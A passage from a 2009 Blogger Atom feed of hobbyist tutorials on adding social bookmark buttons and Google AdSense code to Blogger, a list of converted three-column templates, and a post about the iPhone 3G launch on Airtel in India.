expr:href='"http://www.google.com/bookmarks/mark?op=add&amp;amp;amp;bkmk=" + data:post.url +  "&amp;amp;amp;title="+data:post.title' expr:onmouseout='"javascript:showsbtext("sbtxt" + data:post.id + "",0);"' expr:onmouseover='"javascript:showsbtext("sbtxt" + data:post.id + "",20);"' target='_blank'&amp;gt;&amp;lt;img alt='Google' src='http://files.bloggerplugins.org/icon_sb_goo.gif'/&amp;gt;&amp;lt;/a&amp;gt;&lt;br /&gt;&amp;lt;/td&amp;gt;&lt;br /&gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;&amp;lt;/table&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;&amp;lt;/span&amp;gt;&lt;/blockquote&gt;&lt;span style="font-weight: bold;"&gt;STEP  V-&lt;/span&gt; Now save template and check your blog, it should like the one I've in my blog here.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp1.blogger.com/_tbHfaj1A058/SIinJX9aJFI/AAAAAAAAEGU/rkrtvPv4HYI/s1600-h/social.JPG"&gt;&lt;img style="cursor: pointer;" src="http://bp1.blogger.com/_tbHfaj1A058/SIinJX9aJFI/AAAAAAAAEGU/rkrtvPv4HYI/s400/social.JPG" alt="" id="BLOGGER_PHOTO_ID_5226611147055703122" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Feel free to comment if you like this post or if you are having any difficulty trying it.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-6167881201298113312?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/6167881201298113312/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=6167881201298113312' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/6167881201298113312'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/6167881201298113312'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2009/07/how-to-add-social-bookmarks.html' title='How to add Social Bookmarks Buttons/Icons after every post in Blogger?'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp1.blogger.com/_tbHfaj1A058/SIinJX9aJFI/AAAAAAAAEGU/rkrtvPv4HYI/s72-c/social.JPG' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-3200631514496773626</id><published>2009-07-26T10:16:00.013-07:00</published><updated>2009-07-26T10:16:06.712-07:00</updated><title type='text'>How to add Google Adsense Ads code to Blogger Blog ?</title><content type='html'>Now there have been a lot increase in the people seeking Blogging as a source of their income. Many of these new Bloggers don't have the technical knowledge realted to internet and web deisgn like html,java etc.&lt;br /&gt;&lt;br /&gt;That's why this is the most common question the new bloggers have while starting blogging.Even I had the same problem when I started blogging and wanted to put Google Adsense ads on my blog.I started blogging using free wordpress (&lt;a href="http://myphone3250.wordpress.com/"&gt;myphone3250.wordpress.com&lt;/a&gt;), and was not knowing that Wordpress does not allow you to add HTML code to your blog.But I tried and ended up getting my blog suspended by Wordpress.&lt;br /&gt;&lt;br /&gt;Then I made Blogger blog and after that never have to look back from then.&lt;br /&gt;&lt;br /&gt;So here is step-by-step guide for - How to add Google Adsense Ads code to your Blogger Blog -&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Step I - &lt;/span&gt;Login to your &lt;a href="https://www.google.com/adsense/"&gt;Adsense&lt;/a&gt; account. Goto &gt; Adsense Setup &gt; Adsense Content (if you want to add Adsense search click Adsense for Search).After selecting your Ad format,click continue and finally Submit and Get Code.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Step II - &lt;/span&gt;Now copy the code and login to your Blogger account.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Step III -&lt;/span&gt; Goto &gt; Dashboard &gt; Layout.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Step IV - &lt;/span&gt;Click on "Add Page Element" on whatever place you want to place Google Adsense Ads (like sidebar,footer,header,before or after main post,etc.)&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Step V - &lt;/span&gt;Now in the list look for "HTML/Javascript" and click "Add to Blog"&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Step VI -&lt;/span&gt; Leave the title blank(or put headng like "Sponsored Ads") and paste the code you copied from Google Adsense in the box below.Click save and you are done.&lt;br /&gt;&lt;br /&gt;You can also drag and drop the box and place it wherever you want on your "Page Elements" page.Click save if you have changed the position of the ads.&lt;br /&gt;&lt;br /&gt;Now have a look at your blog it will be showing Google Adsense ads.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Imp. Note:&lt;/span&gt; It takes at least 10 mins. for your Google Adsense ads to dislpay on your blog after you have created them on Google Adsense.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-3200631514496773626?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/3200631514496773626/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=3200631514496773626' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/3200631514496773626'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/3200631514496773626'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2009/07/how-to-add-google-adsense-ads-code-to.html' title='How to add Google Adsense Ads code to Blogger Blog ?'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-4331841635369699640</id><published>2009-07-26T10:16:00.011-07:00</published><updated>2009-07-26T10:16:05.701-07:00</updated><title type='text'>Apple iPhone 3G Coming Soon on Airtel in India.</title><content type='html'>I was just checking my inbox in morning and was surprised to check this email from Airtel about launch of Apple iPhone 3G in India.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp1.blogger.com/_tbHfaj1A058/SIwCTUYSF2I/AAAAAAAAEH0/tYwNbbEhjYE/s1600-h/iphone.PNG"&gt;&lt;img style="cursor: pointer;" src="http://bp1.blogger.com/_tbHfaj1A058/SIwCTUYSF2I/AAAAAAAAEH0/tYwNbbEhjYE/s400/iphone.PNG" alt="" id="BLOGGER_PHOTO_ID_5227555798381631330" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Like many others I am also waiting desperately to get a hand on this Hi-Tech Gadget which has been declared &lt;a href="http://www.time.com/time/business/article/0,8599,1678581,00.html"&gt;"Invention of Year" for 2007 by Time&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Though it's been available since long in the Grey Market at some 25,000 - 30,000 bucks, but still I wanted to buy it's legally unlocked version.&lt;br /&gt;&lt;br /&gt;In India &lt;a href="http://www.apple.com/pr/library/2008/06/09bharti.html"&gt;Bharati Airtel&lt;/a&gt; and Vodafone declared that they are going to launch the Apple iPhone 3G soon.Though they didn't mention the Official Date for launch,their have been news that it's probably the month of September.&lt;br /&gt;&lt;br /&gt;Now you may be thinking how I got this email from Airtel,.....actually I Booked the iPhone on &lt;a href="http://www.airtel.in/iphone3g/"&gt;Airtel's site&lt;/a&gt;.You can also Book an Apple iPhone 3G for yourself with Airtel &lt;a href="http://www.airtel.in/iphone3g/"&gt;HERE&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;If you want to Register it with Vodafone you can do it &lt;a href="http://www.vodafone.in/existingusers/iPhone/Pages/preregister-iPhone.aspx"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;But still it's not clear when it is going to launch oficially in India.&lt;br /&gt;&lt;br /&gt;You can see the list of countries where Apple iPhone is available and where it is going to be available soon &lt;a href="http://www.apple.com/iphone/countries/"&gt;here&lt;/a&gt;. Though India is also listed in the "Coming Soon" list but still no official date of launch.&lt;br /&gt;&lt;br /&gt;Let's see when does Apple launches this "Invention of Year 2007in India.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-4331841635369699640?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/4331841635369699640/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=4331841635369699640' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/4331841635369699640'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/4331841635369699640'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2009/07/apple-iphone-3g-coming-soon-on-airtel.html' title='Apple iPhone 3G Coming Soon on Airtel in India.'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp1.blogger.com/_tbHfaj1A058/SIwCTUYSF2I/AAAAAAAAEH0/tYwNbbEhjYE/s72-c/iphone.PNG' height='72' width='72'/><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-475324115334356872</id><published>2009-07-26T10:16:00.009-07:00</published><updated>2009-07-26T10:16:04.355-07:00</updated><title type='text'>How to add Google Adsense ads code in main post of Blogger Blog ?</title><content type='html'>As you may see that I've added the Google Adsense Ads code in my main post just below the title of the post.&lt;br /&gt;&lt;br /&gt;It is the adspace getting me more clicks than other ad spaces.Also it is some of the most popular tips to increase your earnings form Google Adsense.&lt;br /&gt;&lt;br /&gt;By placing the Google Adsense ads in the main post body,your ads will attract more attention of your readers and get more CTR i.e "Click Through Rate",ultimately increasing your Google Adsense earnings.&lt;br /&gt;&lt;br /&gt;Here is the Step-by-Step Guide on how to do it -&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Step I - &lt;/strong&gt;First of all login to your &lt;a href="https://www.google.com/adsense/"&gt;Adsense&lt;/a&gt; account. Goto &gt; Adsense Setup &gt; Adsense Content (if you want to add Adsense search click Adsense for Search).After selecting your Ad format,click continue and finally Submit and Get Code.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Step II -&lt;/strong&gt; Now copy the adsense .&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Step III -&lt;/strong&gt; Now you will have the make the code compatible,so that it will work with Blogger template. If you put the code as you get it from Google Adsense,your ads will not appear.You will have to PARSE the code.Parsing the Google Ads code is not against its policies.&lt;br /&gt;You can parse the code at &lt;a href="http://www.blogcrowds.com/resources/parse_html.php"&gt;this site - Blogcrowds&lt;/a&gt;. Just paste your code in the box and click "Parse" and you will get the parsed code.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Step IV -&lt;/strong&gt; Now login to your Blogger account and goto - Dashboard&gt; Layout &gt; Edit HTML &gt; Expand widget Templates.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Step V -&lt;/strong&gt; Search for this tag -&lt;br /&gt;&lt;br /&gt;&amp;lt;div class='post-body entry-content'&amp;gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Step VI -&lt;/strong&gt; Now place your parsed Google Adsense Code just below this tag and click "Save Template".&lt;br /&gt;&lt;br /&gt;That's it,check your blog and you will see Google Ads in your main post just below the title of the post.&lt;br /&gt;&lt;strong&gt;Step VII -&lt;/strong&gt; If you want to paste it after the post body in the Footer of the post,just search for tis tag -&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;&amp;lt;div class='post-footer-line post-footer-line-1'&amp;gt;&lt;/blockquote&gt;and place your parsed Google ads code below this tag and click "Save Template".&lt;br /&gt;&lt;br /&gt;If you want that the &lt;strong&gt;Google Ads should appear after each post&lt;/strong&gt; you can do it by -----&lt;br /&gt;&lt;br /&gt;---Goto page elemenst and in Blog Posts click edit,there you will get option of "Show Ads between Posts",just select the box and choose the style of ads and save it.&lt;br /&gt;&lt;br /&gt;Feel free to comment if you have any difficulties in implementing these steps.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-475324115334356872?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/475324115334356872/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=475324115334356872' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/475324115334356872'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/475324115334356872'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2009/07/how-to-add-google-adsense-ads-code-in.html' title='How to add Google Adsense ads code in main post of Blogger Blog ?'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-3052319739226084886</id><published>2009-07-26T10:16:00.007-07:00</published><updated>2009-07-26T10:16:03.417-07:00</updated><title type='text'>24 Default 2 column Blogger Templates converted into 3 column templates.</title><content type='html'>The Blogger provides total of 24 default templates,but all of them are 2 column.&lt;br /&gt;&lt;br /&gt;Now-a-days due to a boom in blog monetization with Google Adsense and other Ad networks,there have been a demand of 3 column templates.&lt;br /&gt;&lt;br /&gt;Here I am providing the 3 column versions of the default 2 column Blogger template3.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;1. 565 Template&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;img src="http://bp0.blogger.com/_PeRC281eiFY/RiOIp1XQMfI/AAAAAAAAADE/eEAElL-qtmk/s320/565-thumb.jpg" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://free.blogger.help.googlepages.com/565.xml"&gt;&lt;span style="font-weight: bold;"&gt;Click to Download&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;2. 897 Template&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;img src="http://bp2.blogger.com/_PeRC281eiFY/RidZV3DKRRI/AAAAAAAAAEs/1g_dv3SHXTc/s320/897-thumb.jpg" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://free.blogger.help.googlepages.com/897.xml"&gt;&lt;span style="font-weight: bold;"&gt;Click to Download&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;3. Denim Template&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;img src="http://bp1.blogger.com/_PeRC281eiFY/RiOIqFXQMhI/AAAAAAAAADU/jeonUp5QSYw/s320/denim-thumb.jpg" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://free.blogger.help.googlepages.com/Denim.xml"&gt;&lt;span style="font-weight: bold;"&gt;Click to Download&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;4. Denim Washed Template&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;img src="http://bp2.blogger.com/_PeRC281eiFY/RidjP3DKRWI/AAAAAAAAAFU/R2kmqkVlAlg/s320/denim-washed-thumb.jpg" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://free.blogger.help.googlepages.com/DenimWashed.xml"&gt;&lt;span style="font-weight: bold;"&gt;Click to Download&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;5. Denim Light Template&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;img src="http://bp0.blogger.com/_PeRC281eiFY/RidZWXDKRVI/AAAAAAAAAFM/0SAWrsadRkU/s320/denim-light-thumb.jpg" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://free.blogger.help.googlepages.com/DenimLight.xml"&gt;&lt;span style="font-weight: bold;"&gt;Click to Download&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;6. Dots Template&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;img src="http://bp3.blogger.com/_PeRC281eiFY/RidZWHDKRTI/AAAAAAAAAE8/XdAQOYOUiVA/s320/dots-thumb.jpg" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://free.blogger.help.googlepages.com/Dots.xml"&gt;&lt;span style="font-weight: bold;"&gt;Click to Download&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;7. Dots Dark Template&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;img src="http://bp2.blogger.com/_PeRC281eiFY/RidZV3DKRSI/AAAAAAAAAE0/5D_igHPm-q4/s320/dots-dark-thumb.jpg" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://free.blogger.help.googlepages.com/dotsdark.xml"&gt;&lt;span style="font-weight: bold;"&gt;Click to Download&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;8. Harbour Template&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;img src="http://bp1.blogger.com/_PeRC281eiFY/RiOIqFXQMgI/AAAAAAAAADM/IGgw1RVHu8A/s320/harbor-thumb.jpg" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://free.blogger.help.googlepages.com/Harbor.xml"&gt;&lt;span style="font-weight: bold;"&gt;Click to Download&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;9. Herbert Template&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;img src="http://bp2.blogger.com/_PeRC281eiFY/RiS-0FXQMnI/AAAAAAAAAEE/5MvZwHubnGY/s320/herbert-thumb.jpg" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://free.blogger.help.googlepages.com/Herbert.xml"&gt;&lt;span style="font-weight: bold;"&gt;Click to Download&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;10. Minima White Template&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;img src="http://bp2.blogger.com/_PeRC281eiFY/RiOIqVXQMiI/AAAAAAAAADc/TL_x9GeJYwY/s320/minima-thumb.jpg" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://free.blogger.help.googlepages.com/Minimawhite.xml"&gt;&lt;span style="font-weight: bold;"&gt;Click to Download&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;11. Minima Black Template&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;img src="http://bp2.blogger.com/_PeRC281eiFY/RxjqY86NWqI/AAAAAAAAAS0/uXR8MRdaPIg/s400/minima-black-thumb.jpg" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://free.blogger.help.googlepages.com/Minimablack.xml"&gt;&lt;span style="font-weight: bold;"&gt;Click to Download&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;12. Minima Blue Template&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;img src="http://bp3.blogger.com/_PeRC281eiFY/RkSDN4dCPwI/AAAAAAAAAHU/Sn3jliDkds0/s320/minima-blue-thumb.jpg" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://free.blogger.help.googlepages.com/Minimablue.xml"&gt;&lt;span style="font-weight: bold;"&gt;Click to Download&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;13. Minima Ochre Template&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;img src="http://bp0.blogger.com/_PeRC281eiFY/RkSDOIdCPxI/AAAAAAAAAHc/WoGqSVSqhwY/s320/minima-ochre-thumb.jpg" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://free.blogger.help.googlepages.com/MinmaOchre.xml"&gt;&lt;span style="font-weight: bold;"&gt;Click to Download&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;14. Son of Moto Template&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;img src="http://bp2.blogger.com/_PeRC281eiFY/RkSDNodCPuI/AAAAAAAAAHE/urHr4JZP-2o/s320/son-of-moto-thumb.jpg" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://free.blogger.help.googlepages.com/SonofMoto.xml"&gt;&lt;span style="font-weight: bold;"&gt;Click to Download&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;15. Ms. Moto Template&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;img src="http://bp3.blogger.com/_PeRC281eiFY/RkSDN4dCPvI/AAAAAAAAAHM/h8yzKYrYSWo/s320/ms-moto-thumb.jpg" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://free.blogger.help.googlepages.com/MsMoto.xml"&gt;&lt;span style="font-weight: bold;"&gt;Click to Download&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;16.  Rounders -01 Template&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;img src="http://bp2.blogger.com/_PeRC281eiFY/RiOIqVXQMjI/AAAAAAAAADk/_JBWECJDPt4/s320/rounder01-thumb.jpg" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://free.blogger.help.googlepages.com/Rounders01.xml"&gt;&lt;span style="font-weight: bold;"&gt;Click to Download&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;17. Rounders -02 Template&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;img src="http://bp0.blogger.com/_PeRC281eiFY/RiYoXFXQMoI/AAAAAAAAAEM/MrjnpOlLx1k/s320/rounder02-thumb.jpg" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://free.blogger.help.googlepages.com/Rounders02.xml"&gt;&lt;span style="font-weight: bold;"&gt;Click to Download&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;18.Rounders -03 Template&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;img src="http://bp0.blogger.com/_PeRC281eiFY/RiYoXFXQMpI/AAAAAAAAAEU/gTwbm7p0vuQ/s320/rounder03-thumb.jpg" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://free.blogger.help.googlepages.com/Rounders03.xml"&gt;&lt;span style="font-weight: bold;"&gt;Click to Download&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;19. Sand Dollar Template&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;img src="http://bp0.blogger.com/_PeRC281eiFY/RiYoXFXQMqI/AAAAAAAAAEc/9wYz0DJgHCQ/s320/sanddollar-thumb.jpg" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://free.blogger.help.googlepages.com/SandDollar.xml"&gt;&lt;span style="font-weight: bold;"&gt;Click to Download&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;20. Scribe Template&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;img src="http://bp0.blogger.com/_PeRC281eiFY/RiOI61XQMkI/AAAAAAAAADs/88t-zI2H_hE/s320/scribe-thumb.jpg" /&gt;&lt;br /&gt;&lt;a href="http://free.blogger.help.googlepages.com/scribe.xml"&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Click to Download&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;21. Thisaway  Template&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;img src="http://bp1.blogger.com/_PeRC281eiFY/RiS-z1XQMlI/AAAAAAAAAD0/1Yz2kqznt84/s320/thisaway-thumb.jpg" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://free.blogger.help.googlepages.com/Thisaway.xml"&gt;&lt;span style="font-weight: bold;"&gt;Click to Download&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;22. Thisaway Blue Template&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;img src="http://bp1.blogger.com/_PeRC281eiFY/RiYoXVXQMrI/AAAAAAAAAEk/tiQKGmRPWig/s320/thisaway-blue-thumb.jpg" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://free.blogger.help.googlepages.com/ThisawayBlue.xml"&gt;&lt;span style="font-weight: bold;"&gt;Click to Download&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;23. TicTac Template&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;img src="http://bp2.blogger.com/_PeRC281eiFY/RiS-0FXQMmI/AAAAAAAAAD8/QACHxbh-wR4/s320/tictac-thumb.jpg" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://free.blogger.help.googlepages.com/TicTac.xml"&gt;&lt;span style="font-weight: bold;"&gt;Click to Download&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;24.TicTac Blue Template&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;img src="http://bp3.blogger.com/_PeRC281eiFY/RidZWHDKRUI/AAAAAAAAAFE/b91hU7AcY8s/s320/tictac-blue-thumb.jpg" /&gt;&lt;br /&gt;&lt;a href="http://free.blogger.help.googlepages.com/TicTacBlue.xml"&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Click to Download&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;If you don't know &lt;a href="http://free-blogger-help.blogspot.com/2008/07/how-to-change-your-blogger-template.html"&gt;how to change your Blogger Template&lt;/a&gt;,you can get a complete step-to-step guide &lt;a href="http://free-blogger-help.blogspot.com/2008/07/how-to-change-your-blogger-template.html"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;If you have any difficulty in using these templates on your blog feel free to comment here.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-3052319739226084886?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/3052319739226084886/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=3052319739226084886' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/3052319739226084886'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/3052319739226084886'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2009/07/24-default-2-column-blogger-templates.html' title='24 Default 2 column Blogger Templates converted into 3 column templates.'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp0.blogger.com/_PeRC281eiFY/RiOIp1XQMfI/AAAAAAAAADE/eEAElL-qtmk/s72-c/565-thumb.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-1486040661683374233</id><published>2009-07-26T10:16:00.005-07:00</published><updated>2009-07-26T10:16:02.309-07:00</updated><title type='text'>How to remove the default top navbar from Blogger Blog ?</title><content type='html'>Blogger by default provides a navbar at top which looks like below -&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" 